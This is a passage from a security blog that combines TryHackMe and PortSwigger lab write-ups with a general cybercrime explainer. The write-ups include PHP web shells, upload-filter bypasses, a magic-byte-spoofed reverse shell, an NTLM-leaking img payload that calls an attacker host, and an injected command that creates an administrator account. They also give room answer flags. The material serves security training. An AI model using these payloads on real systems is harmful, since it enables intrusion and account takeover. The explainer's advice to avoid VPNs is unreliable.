CyberiumX - CyberiumX

TryHackMe | Answers For The Threat Modelling

Hello folks,
In this write up, we will provide the answers of Threat Modelling room which is a part of Security Engineer learning path under Threats and Risks section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.

Task 1- Introduction

This task will let you know the learning objectives and prerequisites of this room.

Let’s start modelling threats!
No answer required

Task 2- Threat Modelling Overview

This task will explain the difference between threat, risk and vulnerability, process of threat modelling and will help us understand the role and purpose of different teams in an organization.

Q 2.1- What is a weakness or flaw in a system, application, or process that can be exploited by a threat?
A 2.1- Vulnerability

Q 2.2- Based on the provided high-level methodology, what is the process of developing diagrams to visualise the organisation’s architecture and dependencies?
A 2.2- Asset Identification

Q 2.3- What diagram describes and analyses potential threats against a system or application?
A 2.3- Attack Tree

Task 3- Modelling with MITRE ATT&CK

This task will help you understand the concepts of MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework and how can we apply and utilise this framework in Threat Modelling Process.

Q 3.1- What is the technique ID of “Exploit Public-Facing Application”?
A 3.1- T1190

Q 3.2- Under what tactic does this technique belong?
A 3.2- Initial Access

Task 4- Mapping with ATT&CK Navigator

In this task you will learn about the famous open-source tool called ATT&CK Navigator which helps the security teams to determine matrices based on threat scenario.

Q 4.1- How many MITRE ATT&CK techniques are attributed to APT33?

A 4.1- 31

Q 4.2- Upon applying the IaaS platform filter, how many techniques are under the Discovery tactic?

A 4.2- 13

Task 5- DREAD Framework

In this task you will understand what is DREAD (Damage, Reproducibility, Exploitability, Affected Users and Discoverability) framework and its guidelines for qualitative Risk Analysis.

Q 5.1- What DREAD component assesses the potential harm from successfully exploiting a vulnerability?
A 5.1- Damage

Q 5.2- What DREAD component evaluates how others can easily find and identify the vulnerability?
A 5.2- Discoverability

Q 5.3- Which DREAD component considers the number of impacted users when a vulnerability is exploited?
A 5.3- Affected Users

Task 6 STRIDE Framework

In this task you will learn about STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege) framework and its application over Threat Modelling.

Q 6.1- What foundational information security concept does the STRIDE framework build upon?
A 6.1- CIA Triad

Q 6.2- What policy does Information Disclosure violate?
A 6.2- Confidentiality

Q 6.3- Which STRIDE component involves unauthorised modification or manipulation of data?
A 6.3- Tampering

Q 6.4- Which STRIDE component refers to the disruption of the system’s availability?
A 6.4- Denial of Service

Q 6.5- Provide the flag for the simulated threat modelling exercise.

A 6.5- THM{m0d3ll1ng_w1th_STR1D3}

Task 7- PASTA Framework

In this task you will understand about another important framework called PASTA (Process for Attack Simulation and Threat Analysis) framework. You will learn about the guidelines, benefits and applications of PASTA Framework.

Q 7.1- In which step of the framework do you break down the system into its components?
A 7.1- Decompose the Application

Q 7.2- During which step of the PASTA framework do you simulate potential attack scenarios?
A 7.2- Analyse the Attacks

Q 7.3- In which step of the PASTA framework do you create an inventory of assets?
A 7.3- Define the Technical Scope

Q 7.4- Provide the flag for the simulated threat modelling exercise.
A 7.4- THM{c00k1ng_thr34ts_w_P4ST4}

We will be providing the answers for Security Engineer Learning Path. If you need the explanation to these answers, please comment below and we will provide the explanation as per request.

You can check out our other blogs here.
Happy Pentesting!!!
Team CyberiumX

PortSwigger- File Upload Vulnerabilities

Hello folks,

This blog focuses on how we can identify and exploit File Upload vulnerabilities on websites. In this blog, I will be providing a detailed walkthrough of all PortSwigger’s Lab. I am assuming that you guys have basic knowledge of file types.

You can check out the PortSwigger’s labs for File Upload vulnerability here.

Before proceeding with the labs, I will be explaining about the concept of File upload Vulnerabilities.

First of all there are some conditions that the web application must follow before exploiting this vulnerability:

There must be an upload functionality on the website for which we might have to register on the website.
We should know the server side language in which we will generate a malicious file.
The files which we are uploading must be accessible from the website.

In order to achieve these conditions, we need to perform proper reconnaissance on the web application.

For condition number 1 and 3, we can use Directory Brute Forcing technique using tools like Gobuster, Dirb, Dirbuster, etc. and for condition number 2, we need to use a technology profiler like Wappalyzer.

After performing complete reconnaissance, we need to create a malicious file written in server side language like PHP, NodeJS, Asp, etc. These malicious files are called web shells.

Let’s now proceed without any delay and begin the penetration testing process on PortSwigger’s labs.

Lab-1 Remote code execution via web shell upload

In this lab scenario, we will be looking at a simple case of File Upload vulnerability without any defense in place. Let us access the lab. We will require Burp Suite Community edition here.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

After logging in we will find an upload functionality on the “My-account” page. Now it’s time to create a web shell written in PHP. We can open our terminal and type following command:

nano malicious.php

It will create a file with name as malicious.php and open it on nano editor where we can simply type the following payload which will help us to read the contents of /home/carlos/secret:

<?php echo file_get_contents(‘/home/carlos/secret’); ?>

Now click on the “Browse” and select the file that we just created “malicious.php”. Click on Okay to upload it.

We will find a message on the webpage “The file avatars/malicious.php has been uploaded.”

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to execute the web shell.

In the new tab we will find the contents of a secret file which we can simply submit to solve the lab.

Great, the lab is solved. Let us try another type of web shell which will help us to execute any command on the target web server. For this, again open another file on nano editor and type the following payload:

<?php echo system($_GET[‘command’]); ?>

Now try to upload the second web shell on the same upload functionality. We will find that the file is uploaded successfully.

Now in order to execute the web shell we can again open the image on new tab and provide following parameter in the URL followed by the command which we want to execute on the web server:

?command=cat /etc/passwd

We will find the contents of the passwd file on our web page.

Lab-2 Web shell upload via Content-Type restriction bypass

In this lab, we will see that if the server is only allowing image files (it may only allow file content types like image/jpeg and image/png) then we need to bypass this Content-Type restriction using Burp Suite. Let’s begin the process.

Access the lab and later will require the Burp Suite Community edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

After logging in we will find an upload functionality on the “My-account” page. We can use the same malicious.php web shell and upload it on the application by clicking on “Browse”. And finally click on “Upload”.

We will find an error saying that file type is not allowed. Let us go to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the POST request and send it to the Repeater.

Go to the Repeater tab and look for the Content-Type header. Change the value of this header to image/png or image/jpeg. Now send the request and we will see that the malicious file has been uploaded successfully.

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to execute the web shell.

In the new tab we will find the contents of a secret file which we can simply submit to solve the lab.

Lab-3 Web shell upload via path traversal

In this scenario, we will explore a condition where the server will be uploading the files in a non-executable directory. It means after uploading the malicious file, we will not be able to execute it. But we have a bypass for it using Path Traversal technique which we are going to see in this lab

Access the lab and later will require the Burp Suite Community edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

We will find a message on the webpage “The file avatars/malicious.php has been uploaded.”

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to execute the web shell. In the new tab we will find that the file is not getting executed.

Let us go to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the POST request and send it to Repeater.

Go to the Repeater tab and try to change the filename to ../malicious.php. But we will find the file is still uploaded to the same directory. Let us try to URL encode the ../ characters and then try to send the request. This time we will find that the file is successfully uploaded to one directory up.

Now, find the GET request on the HTTP History sub-tab which allows us to execute the file. Send this request to the repeater.

Go to the Repeater tab and change the URL to /files/avatars/../malicious.php and we will find the contents of the secret file which we can simply submit to the lab.

Lab-4 Web shell upload via extension blacklist bypass

In this scenario, we will see how we can perform file upload via Overriding the server configuration. In order to modify or add to one or more of the global settings, many servers also let developers write unique configuration files within specific folders. If a .htaccess file is present, for instance, Apache servers will load a configuration specific to a given directory and will allow us to execute a file with any extension as a PHP file.

Access the lab and later we will require the Burp Suite Community edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to login page where we can use our credentials to login.

Let us go to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the POST request and send it to Repeater.

Go to the Repeater tab and make the following changes:

Change the filename to .htaccess.
Replace the web shell content with:

AddType application/x-httpd-php .any

We will find that the file has been uploaded successfully.

Now send another POST request to the Repeater and go to Repeater tab. Now change the filename to “malicious.any”. We will find that the file with .any has been uploaded successfully.

Now, find the GET request on the HTTP History sub-tab which allows us to execute the file. Send this request to the Repeater.

Go to the Repeater tab and change the URL to /files/avatars/malicious.any and we will find the contents of the secret file which we can simply submit to the lab.

Lab-5 Web shell upload via obfuscated file extension

In this lab scenario, we will learn how we can obfuscate file extensions. There are many techniques that we will explore here. You can read the content on PortSwigger. Let us start the process.

Access the lab and later we will require the Burp Suite Community edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

After logging in we will find an upload functionality on the “My-account” page. We can use the same abc.php web shell and upload it on the application by clicking on “Browse”. And finally click on “Upload”. We will find an error saying that only jpg and png files are allowed.

Let us go to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the POST request and send it to Repeater. Go to the Repeater tab and change the filename to abc.php.jpg. We will find that the file has been uploaded successfully.

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to execute the web shell. In the new tab, we will get an error.

Now we can use the null byte and change the filename to abc.php%00.jpg and send the request. We will find that the file abc.php has been successfully uploaded.

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to execute the web shell. We will find the contents of a secret file which we can simply submit to the lab.

Lab-6 Remote code execution via polyglot web shell upload

More secure servers attempt to confirm that the contents of the file truly match what is expected rather than automatically trusting the Content-Type given in a request. We can create a Polyglot web shell using Exiftool. Let us see how we can create a polyglot and upload our web shell.

Access the lab and later we will require the Burp Suite Community edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

We need to create a polyglot using Exiftool on our Kali machine. Open terminal and type the following command:

exiftool -comment=”<?php echo ‘STARTING’.file_get_contents(‘/home/carlos/secret’).’ENDING’; ?>” any_image.png -o poly.php

This will create a polyglot for us which we can confirm with the help of following command:

exiftool poly.php

Now let us try to upload the poly.php file on the web application. We will find that this file has been uploaded successfully.

Lab-7 Web shell upload via race condition

Modern frameworks are better able to withstand these kinds of assaults. Typically, they don’t upload files straight to the file system location where they are meant to be stored. To avoid overwriting existing files, they instead take safeguards like uploading to a temporary, sandboxed directory first and randomizing the name. Once this temporary file has undergone confirmation, they only transfer it to its final destination if it is judged secure to do so. Let’s see how we can exploit race conditions for file uploading.

Access the lab and later we will require the Burp Suite Professional edition here to solve this lab.

On the webpage, there is a “My account” button which will take us to the login page where we can use our credentials to login.

Let us go to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the POST request and send it to Intruder.

Now in order to get the file execute link, we can try to upload any png or jpg files and see where the file is getting stored.

Now go back to the “my-account” page and right click on the avatar image and click on “Open Image on New Tab” in order to access the image.

Go back to Burp Suite and click on the “Proxy” tab and click on the “HTTP History” sub-tab. Look for the GET request which we used to access the image and send the request to Intruder.

Now we have two requests on Intruder. Let’s name the tab as POST and GET based on the requests respectively. Clear everything in the Positions sub-tab of Intruder for both requests and then in the Payloads sub-tab select the payload type as Null payloads and also select “Continue indefinetely”.

Start the Attack for POST request first so that it will start uploading the file indefinitely and then start the attack for GET requests in order to access the web shell. We will get 200 status code on the GET request Intruder attack which will provide us the contents of the Secret file.

Submit the secret in order to solve the lab.

This is how we can find and exploit File upload vulnerabilities. We have explored all the possible ways to find and exploit it.

There are some other methods to perform File upload vulnerabilities that are demonstrated on TryHackMe platform as well. We will be uploading it soon. So stay tuned.

You can read out our other write-ups on PortSwigger’s labs here.

Happy Pentesting!!!

Team CyberiumX

Cybercrime: Dark Web of Digital Attacks

Introduction

Technology has provided unparalleled ease and connectivity to our digital age, but it has also given rise to a worrying phenomenon: cybercrimes. These are illegal operations carried out online that have as their targets people, businesses, and even governments. In this blog, we’ll go into the world of cybercrimes and examine their types, effects, countermeasures, and roles in law enforcement.

What is Cybercrime?

In today’s world, cybercrime has become one of the major problems that people all over the world face. So, what exactly is cybercrime? Cybercrime is a crime that is committed with the use of a networked device, or a computer, for any purpose. Those who commit cybercrimes are known as cybercriminals.

A cybercriminal may use your device to get your personal info, your business info, government info, or even take your device offline. A cybercriminal can also sell or acquire the information listed above online. It is happening all around the world on a daily basis. Cybercriminals are the people who are good at hacking and taking advantage of technology. They usually do their best work in places where there’s a ton of digital data.

Top Common Types of Cybercrimes

Below are some of the most common cybercrimes around the world.

Impersonation/Identity Theft

Child Pornography

SIM Swap Scam

Website Defacement

Phishing

Malware and ransomware

Cyber Stalking

Data Breach

Cybersquatting

Cyber Bullying

Online Sextortion

Impersonation/Identity Theft

Identity Theft is a criminal activity in which an individual’s personal and confidential data is unlawfully accessed by cyber criminals. This data, which may include social security information, credit card information, and password information, is used for the purpose of obtaining financial gain, fraud, and other criminal activities. As digital transactions and digital presence have become increasingly prevalent, the potential for identity theft has increased significantly.

Criminals use a variety of methods to obtain personal information, including phishing, data breach, and cyber-attacks. Once this information is obtained, it can cause a wide range of damages to victims, from financial losses to psychological trauma. Many victims spend years recovering from the consequences, dealing with banks, credit bureaus, and law enforcement agencies.

Child pornography

Child pornography is a type of sexual exploitation of children. According to federal law, child pornography is any visual representation of sexual activity involving a minor (under the age of 18). Images of child pornography may also be referred to as images of child sexual abuse.

There are different types of child pornography, like images of a minor engaging in sexual activity, showing certain parts of their body for sexual purposes, encouraging a minor to engage in a sexual activity, or showing a minor engaging in a sexual activity that is illegal. These types of child pornography can be found in a variety of places, like photos, videos, writing, or audio recordings.

SIM swap scams

SIM swap scams are a type of fraud in which cybercriminals take advantage of weaknesses in a mobile phone’s operating system to access a victim’s personal data and accounts without authorization. What is SIM swap scam? In SIM swap scams, cybercriminals use social engineering and phishing attacks to gain access to the victim’s phone number and other personal information. Once they have this information, they pose as the victim and contact their mobile service provider to ask them to transfer their phone number into a new SIM that they own.

Website defacement

Website defacement is the act of maliciously altering the look and feel of a website. It is usually done as part of a hacktivism campaign or to demonstrate the attacker’s abilities. The attackers take advantage of weaknesses in the website’s security to access the original content and replace it with their own message, image, or even a political statement. When a website is defaced, it is often displaying messages that are either political, social or ideological in nature. It can also contain explicit content or even messages that promote the attacker’s own agenda.

The purpose of website defacement is to cause embarrassment to the website owner. It can also be used to spread a specific message or to cause chaos and disruption.

Phishing Attacks

Phishing is a type of malicious cyberattack that seeks to deceive individuals into providing personal information, including usernames and passwords, as well as credit card and personal identification information. Phishing attacks are typically conducted through deceptive emails, messages or websites that masquerade as legitimate entities in order to deceive recipients into believing they are communicating with a reliable source.

Cyberstalking

Cyberstalking is the practice of harassing, stalking, tracking, and intimidating people online through the use of digital communication tools and technologies. The purpose of cyberstalking is to harass, monitor, monitor, and threaten the victim, causing them emotional distress, and invading their privacy. The most common types of cyberstalkers are: Social media users Email users Instant messaging users Other online tools used by cyberstalkers Sending threatening messages Spreading false information Sharing personal data without consent Creating fake profiles to pretend to be the victim Monitoring their online presence

Data breach

A data breach is an unauthorized access, disclosure, or theft of confidential, personal, or sensitive information. It can occur as a result of a cyberattack, hacking incident, accidental disclosure, or due to internal negligence. A data breach can result in the loss of personal information, financial information, login information, or other sensitive data. It can also lead to identity theft, fraud, damage to reputation, and legal consequences. Data breaches can be sold online, used in phishing campaigns, or used in a variety of other ways by criminals.

Cybersquatting

Cybersquatting involves the registration of domain names that mimic well-known trademarks, brand names, or popular domain names with the intention to capitalize on the confusion or tarnish the original owner’s reputation. These domains can be used for advertising, impersonating legitimate brands, charging exorbitant fees for release, or redirecting web traffic to gain a competitive edge. Cyberquatting harms intellectual property, brand integrity, and consumer confusion. Fortunately, there are legal remedies available to trademark owners. These remedies include registering your trademark, keeping an eye on your domain, and taking legal action against cybersquatters as soon as possible to protect your brand and online presence.

Cyberbullying

Cyberbullying is a type of online harassment that uses digital communication tools to bully, degrade, or threaten people. It includes things like sending hurtful texts, spreading fake info, sharing private info without permission, and making fake profiles to mock the victim. It’s usually done on social media, messaging apps, or online forums. Cyberbullying can have a huge impact on people, causing them to feel anxious, depressed, and even suicidal. It’s especially worrying for young people because they rely so much on digital communication.

Online Sextortion

Sextortion is a form of cybercrime in which cybercriminals coerce victims into sharing intimate images, video, or personal data. The victim is then threatened with the exposure or distribution of the content if the victim does not comply with the blackmailer’s demands. This threat is typically accompanied by extortion demands for money, presents, or explicit content. Cybercriminals often pose as a trustworthy individual in order to gain the victim’s trust and enforce their demands.

Malware and Ransomware

Malware is a type of malicious software that’s designed to hurt, take advantage of, or get into your computer system or network. It’s made up of all kinds of malicious software, from viruses and worms to trojans and spyware. One of the most dangerous types of malware is ransomware, which encrypts your files or locks you out of your system. You have to pay a ransom in cryptocurrency to get your files back or unlock your system. This kind of ransomware can cause a lot of damage to your data, money, and your business.

Impact of Cybercrimes

Cybercriminals are increasingly targeting individuals in the modern digital world. As cyberattacks become more sophisticated, individuals are increasingly exposed to financial losses, identity fraud, psychological distress, and reputational damage.

Financial Losses: Cybercrime can cause significant financial losses for both individuals and organizations. Hackers may acquire confidential financial data, engage in fraudulent activities, or request ransom payments through ransomware attacks. Such incidents can result in direct financial losses and recovery expenses.

Data Breaches: Cybercrimes that involve the theft of personal information or confidential data can have serious repercussions. Personal data breaches can cause identity theft, money laundering, and unauthorized account access. For businesses, data breaches may involve the loss of valuable information, legal obligations, and damage to reputation.

National Security Concerns: Cyberattacks can grow into national security threats. Government agencies, military facilities and critical infrastructure can be targeted by state-sponsored cyberattacks or massive cyber espionage that threatens a nation’s security and stability.

Loss of Intellectual Property: The primary objective of cyberattacks on businesses is the theft of intellectual property, including trade secrets and product designs, as well as research data. Intellectual property theft can cause considerable economic losses and impede innovation.

Emotional and Psychological Impact: Emotional and psychological distress can be experienced by individuals who are victims of cybercrimes such as online bullying, harassment, and cyberstalking. The anonymity afforded by the internet can encourage cybercriminals to perpetrate their crimes and increase the amount of damage they cause.

Global Impact: Cybercrimes have no geographical boundaries and can be perpetrated from any location in the world, with perpetrators targeting victims in multiple countries. As a result, the global nature of cybercrime makes it difficult to effectively enforce legislation and pursue perpetrators.

Reputational damage: Last but not least, cybercrime can damage a person’s reputations. Cybercriminals use stolen information to publish embarrassing or damaging content on the internet. This can lead to a loss of trust and credibility in the eyes of the public. Reputational damage is especially severe in professional settings and can result in job loss or difficulty in finding employment.

Cybercrime is a growing concern for governments, businesses and individuals alike. Governments, businesses and individuals are increasingly investing in cyber security strategies, awareness campaigns and international partnerships to fight cybercrime. However, as technology continues to evolve, so does the way cybercriminals find ways to take advantage of vulnerabilities. This highlights the constant need to be vigilant and adapt to the ever-changing digital environment.

Prevention and Mitigation Strategies

Cyber security risks are becoming increasingly complex and widespread. The prevention and mitigation of cybercrime is of paramount importance in safeguarding individuals, companies, and society from its adverse effects. There are a variety of steps that individuals, companies, or governments can take to reduce and prevent the effects of cybercrime, including:

Strong Passwords: Using complex passwords and updating them regularly can thwart unauthorized access.

Two-Factor Authentication: Adding an extra layer of security, two-factor authentication requires a second form of verification beyond just a password.

Keeping Software Updated: Regularly updating software and applications helps to patch known vulnerabilities.

Educating Users: Raising awareness about cyber threats and teaching safe online practices can empower individuals to protect themselves.

Public Wi-Fi: It is advisable not to connect your devices to public Wi-Fi networks and also avoid using Virtual Private Network (VPN) as it may pose serious threats to devices as well as your life.

Conclusion

Cybercrime is an increasingly pressing issue that threatens the security of individuals, companies, and society. With the advancement of technology, the frequency and severity of cybercrime incidents are likely to rise, resulting in costly and damaging losses.

To combat Cybercrime, it is essential to increase awareness and take proactive measures. Individuals should adopt cyber security best practices and consider investing in Cyber insurance. Companies should focus on cyber security and training to reduce the risk of Cybercrime. Governments should implement policies to hold perpetrators accountable and encourage cyber security best practices.

In conclusion, Cybercrime must be combated in a collective manner by all parties involved, from individuals to businesses to governments. Taking proactive steps can help to reduce the risks associated with Cybercrime and protect against its devastating effects.

You can also check out our other blogs here.

Stay Safe!!!

Team CyberiumX

TryHackMe- Grep

Hello folks,

This blog focuses on a recently added machine called “Grep” within “TryHackMe”. It has been classified as an easy-level challenge where we need to penetrate our way into a Linux machine. Let’s proceed without any delay and begin the penetration testing process.

You can access the Grep machine on TryHackMe by clicking here.

First of all let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using the tool “NMAP”.

nmap <Machine_IP>

Okay, so we have three open ports: 22 (SSH), 80 (HTTP) and 443 (HTTPS). If we try to open the web pages on 80 and 443 ports, we will not get anything special.

Let’s perform Aggressive scan using NMAP with the help of following command:

nmap -A <Machine_IP>

In the response of NMAP scan, we can see that there is a domain name configured for the website which is “grep.thm”. So, we need to edit our /etc/hosts file so that we can access the website running on our target machine using the domain name as shown below:

Now if we try to open the web pages on 80 and 443 ports, we will see that the HTTPS website is showing a valid webpage which is under development. But HTTP is still showing the default page for Apache2.

There is a login page and a registration page. Let us explore the registration page and try to create a user account so we provided Username, Password, Email and Name and then clicked on Register. It gave us an error saying “Invalid or Expired API key”.

I used Burp Suite and proxy all the traffic through it. There is a request header called “X-THM-API-Key” which has a value which is our invalid API.

Finding API Key on Grep

I searched everything on the website but couldn’t get another API. Then I read the description of the room again and remembered that we need to perform OSINT as well in the CTF in order to solve it.

So, it can be possible to look for the API key online for this room. I searched on google and got nothing interesting except SearchMe is a CMS. Then I thought we should search on GitHub for the same. I searched for SearchMeCMS and got one very interesting GitHub repository by supersecuredeveloper. You can check it out here.

So we searched the repository but again got nothing in the code. But, wait it’s GitHub, so if the developer has made some changes in the webpage, we can check out the commits for it which might provide us the correct API.

There are 4 commits out of which one says “Fix: remove key” so let us click on it. And yes we got our API key.

Finding First Flag on Grep

Let us copy it, go to Burp suite and replace the previous API key with the new one we just found. Let us send the request with the same details as previous and you will find that the registration is successful.

After successfully registering ourselves on the website, let us go to the login page and try to login as our user “CyberiumX” and the password. We will see that we are logged in. Also, we got our First Flag as well.

Getting Foothold on Grep

Now, if we go back to the other commits, we will find that there is an upload page as well which we can open after visiting https://grep.thm/public/html/upload.php.

Also we can see which file types are allowed and which file type validation it is using to identify malicious files. The file validation type is Magic bytes which we can simply bypass by changing the file header value using a tool called Hexeditor.

Let us find a reverse shell written in PHP language. We can use the PHP reverse shell of Pentestmonkey which we can find either online or in our own machine at “/usr/share/webshells/php/php-reverse-shell.php”. Now we need to change the starting bits of the file with “ffd8ffe0” written in Hex.

In order to do it, edit the php file and add any 4 characters in the beginning of the file and change the value of the IP variable to your tun0 interface’s IP address.

Now open the file using hexeditor tool and change the file header to jpeg (ffd8ffe0) using the following command:

hexeditor php-reverse-shell.php

After making the changes we can confirm that our file type is a jpeg image using the following command:

file php-reverse-shell.php

Now let us upload the file on the web server using the upload functionality of the website. We will find that the malicious php file is uploaded successfully.

Now we need to find the uploads page where we can see the uploaded documents and execute the malicious php file to get the reverse shell. We can use gobuster for this. The command will be as follows:

gobuster dir -u https://grep.thm/api -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -k 2>/dev/null

We will find that there is a uploads page under api. The URL will be as follows:

https://grep.thm/api/uploads/

We will just click on the php-reverse-shell file to get the reverse connection from the target machine. Also, run netcat on our machine using the following command:

nc –nlvp 1234

As soon as we click on the file, we will get the reverse shell on our netcat

Finding Email of Admin on Grep

Great!!! We got our grip on Grep. Now I explored everything and finally got something interesting at /var/www/backup directory. There is a file named users.sql which contains the details of users. We can simply read the file using following command:

cat users.sql

We can see the password hash and email of admin user.

Finding another Domain on Grep

Also we need to find the another domain where we can get the information of leaked passwords, so for this we can simple check the /etc/hosts file and try to ready it using following command:

cat /etc/hosts

where we will find another domain.

Now we need to add this domain name as well in the hosts file of our machine and then try to visit the URL on http and https.

We will see that it is showing the Apache2 default page on http and forbidden on HTTPS.

After trying everything I thought there might be some other port available on the same machine. I scanned the IP with NMAP but it was taking a lot of time in scanning so I tried rustscan and within 10 seconds I got another open port on the machine which is 51337

Finding Admin’s Password on Grep

Finally on this port we got the access of our new subdomain where we can simply provide the email of admin to retrieve the password. We got the leaked password of an admin user which we can submit to solve the Grep machine.

Nice!!! This was an amazing and interesting box by TryHackMe. Please check out our other blogs on TryHackMe machines here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe – Ra

Hello folks,

This blog focuses on a machine called “Ra” within “TryHackMe”. It has been classified as a hard-level challenge. I will be covering the whole WindCorp series of insane difficulty. Let’s proceed without any delay and begin the penetration testing process.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -sS <Machine_IP>

Total 21 ports are open here so there are many ways to start the enumeration with. Also, due to some specific services like DNS, Kerberos and LDAP, we can say that the machine is a Domain Controller and it is an Active Directory environment. Let’s also perform a version and basic script scan.

nmap -sV -sC <Machine_IP>

There are some domain names mentioned “fire.windcorp.thm” and “windcorp.thm”. So I mentioned them in my /etc/hosts file. Let’s begin the process with port 80.

There is a “Reset Password” button in the top right corner which takes us to fire.windcorp.thm domain. It asks us the username and answer to any of the given security questions.

Finding First Flag on Ra

If you scroll down the windcorp.thm page you will find the name of some employees. These users might help us to get access.

If we hover our mouse on them we will get the usernames of those employees which might be useful to reset their password. We can also check out the source code for the usernames.

There are some images of employees and if you check one of them has a different set of names “lilyleAndSparky.jpg”.

Let’s go back to our reset password page and see if we can reset the password with the information we gathered. We can see that there is a security question which says “What is/was your favorite Pet name?” Let’s provide the details that we got from the name of the image.

Username- lilyle

Anwser- Sparky (Remember to write S in upper case)

Now let’s find some place to login with these credentials. We had SMB port open on the target DC so let’s try it there using the following command:

Smbclient \\\\windcorp.thm\\Shared -U lilyle

We got our first flag by connecting with the “Shared” share.

Finding Second Flag on Ra

There is another interesting deb file for “Spark”. Let’s download it and try to execute it. Now here on my machine I have some issues with installing the Spark. So, I tried to do the same on Attack Box using the following command:

dpkg -i spark_2_8_3.deb

After installation we can execute the application by simply running the ”spark” command.

Now let’s provide the credentials of lilyle users. Provide the domain name as windcorp.thm and select “Save Password” and “Login as invisible”.

Now if you try so it will give you a certificate verification error. So in order to login go to the “Advanced” option and check the following options.

“Accept all the certificates”

“Disable certificate hostname verification”

Now click OK and click on Login. We will see that we are now logged in as Lily Levesque users.

Before installing the spark2.8.3, we searched for the exploits related to this version and we found CVE-2020-12772 for which I found an exploit on GitHub.

We could send a user an img element with an external URL as the source of that image when we established a chat window with them, like this:

<img src=http://<attacker_IP>/test.img>

The attacker’s IP receives the request for the picture together with the NTLM hashes from the user who sees the link, i.e. the user you are talking with, each time the user clicks it or the ROAR module automatically preloads it.

We could run a responder to grab the hashes and use them to log into the user account.

Now we have to find a user who might be online so that we can send this malicious XSS payload to get the NTML hashes of that user. If we go back to the website and scroll down to the list of users, we will find that there is a single user whose avatar is showing active (Green Color). The user’s name is “Buse Candan”.

We will send a malicious XXS message to Buse and also run Responder so that we can simply try to capture the hashes. We can execute responder using the following command:

responder -I tun0

And then send the following payload:

<img src=http://<attacker_IP>/Cyberiumx.jpg>

Yeahh!!! We got the hash of the Buse user. Let’s copy the hash of the user and paste it to a new file. We can crack the hash using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where, hash.txt is the file where we copied the hash.

Great!!! So now we have cracked the password hash of Buse user, we can simply use evil-winrm to get access of the machine using following command:

evil-winrm -u buse -p <password> -i windcorp.thm

We got our second flag (Flag 2.txt). Now after getting the foothold on the machine, we need to escalate our privileges so after trying many methods, the whoami /all command provided a Group name Account Operators whose member is our current user.

Finding Third Flag on Ra

Members of the Account Operators group have access to alter other accounts’ passwords by default. So this gives us an advantage that we can change the password for any other user which we find interesting. So, I further searched some folders/files which are there on the system and found a folder named scripts in C drive.

There are two files out of which one seems interesting. There is a PowerShell script named checkservers.ps1. We can read the file with the following command:

type checkservers.ps1

After reading the PowerShell script, I found a location “C:\Users\brittanycr\hosts.txt”. Whatever we will type in this file, it will be executed on the shell (Powershell) of target windows machine. So somehow we have to become brittanycr user.

We can achieve this by simply changing the password of this user as we are a part of the Account Operators group. We need to use the following command:

net user brittanycr CyberiumX_R00cks

where, “CyberiumX_R00cks” is the new password for the user.

Now, after this we tried to login with the help of evil-winrm tool but it didn’t work.

Let’s try to get the share access using smbclient tool using the following command:

smbclient //windcorp.thm/Users -U brittanycr

And yes!!! We got access to the share. Let’s run the following command:

cd brittanycr

and let us download hosts file using the following:

get hosts.txt

Okay so now we have to edit the file and add any command which might help us to become administrator. We can add the following line at the end of hosts.txt file which will add another user named CyberiumX with password as CyberiumX123 and also add the user to administrators group:

;net user CyberiumX CyberiumX123 /add;net localgroup Administrators CyberiumX /add

Let’s save the file and again login with smbclient and execute the following commands:

smbclient //windcorp.thm/Users -U brittanycr

cd brittanycr

put hosts.txt

This time we have uploaded the hosts.txt file.

Now after sometime we try to login as CyberiumX user using evil-winrm tool with the help of following command:

evil-winrm -u CyberiumX -p CyberiumX123 -i windcorp.thm

Wooohh!! We got access as CyberiumX users. Now we can simply go to the following location and get the Flag3.txt:

C:\Users\Administrator\Desktop

We have successfully hacked RA. So you must have learned a lot from this machine.

You guys can check out our other blogs on TryHackMe Machines here.

Happy Pentesting!!!

Team CyberiumX

PortSwigger- WebSocket Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit WebSocket vulnerabilities on websites. We will be providing a detailed walkthrough of all PortSwigger’s Lab. Readers should have basic knowledge of WebSockets.

You can check out the Portswigger’s labs for WebSocket vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Before starting the labs, let us understand what WebSockets are? A client (often a web browser) and a server can communicate in real-time and in both directions using the WebSockets protocol via a single, persistent connection. WebSockets allow both the client and the server to transmit messages to each other at any time without the need to establish a new connection for each message, in contrast to traditional HTTP requests, which are normally started by the client and handled by the server. This is a new technology and hence contains vulnerabilities. So, let us dive into the identification and exploitation of WebSocket related vulnerabilities.

Lab-1 Manipulating WebSocket messages to exploit vulnerabilities

By altering the contents of WebSocket messages, it is possible to discover and take advantage of the majority of input-based vulnerabilities affecting WebSockets. Let us find out how we can manipulate WebSocket messages.

Access the lab and open Burp Suite Community edition in order to identify WebSocket vulnerability.

